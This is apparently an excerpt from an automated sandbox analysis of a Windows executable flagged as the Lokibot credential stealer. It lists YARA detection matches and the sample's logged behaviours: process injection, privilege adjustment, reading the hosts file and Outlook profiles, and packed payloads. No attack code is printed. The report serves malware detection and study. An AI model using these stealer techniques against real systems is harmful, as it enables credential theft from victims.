                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0040604C
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00404772
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_0040549C
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_004029D4
                Source: C:\Users\user\Desktop\__.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\__.exeCode function: String function: 00405B6F appears 42 times
                Source: __.exe, 00000002.00000003.293725132.00000000031B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs __.exe
                Source: __.exe, 00000002.00000003.292979079.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs __.exe
                Source: __.exeVirustotal: Detection: 34%
                Source: __.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Users\user\Desktop\__.exeJump to behavior
                Source: __.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\__.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\__.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD67.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@56/1
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00402012 CoCreateInstance,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                Source: C:\Users\user\Desktop\__.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: Binary string: wntdll.pdbUGP source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_738D1000 push eax; ret
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\Desktop\__.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dllJump to dropped file
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exe TID: 6184Thread sleep time: -720000s >= -30000s
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00405D7C FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00402630 FindFirstFileA,
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\__.exeThread delayed: delay time: 60000
                Source: C:\Users\user\Desktop\__.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\__.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\__.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0019E886 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0019E672 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0019E9B4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0019E937 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0019E976 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\__.exeMemory written: C:\Users\user\Desktop\__.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\__.exeProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Program Manager
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\__.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_00406069 GetUserNameW,

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
